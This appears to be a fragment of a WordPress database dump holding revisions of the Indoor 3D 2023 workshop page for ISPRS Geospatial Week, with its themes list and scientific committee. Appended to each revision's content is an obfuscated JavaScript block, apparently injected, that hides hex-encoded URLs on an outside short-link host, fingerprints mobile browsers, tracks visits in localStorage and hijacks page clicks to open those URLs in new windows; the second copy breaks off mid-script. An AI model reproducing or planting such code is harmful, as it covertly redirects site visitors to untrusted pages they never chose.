post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 21:59:32','2022-10-07 21:59:32','',2586,'https://gsw2023.com/?p=2613',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(2614,1,'2022-10-07 22:00:25','2022-10-07 22:00:25','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_zigzag color=\"purple\" el_border_width=\"20\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 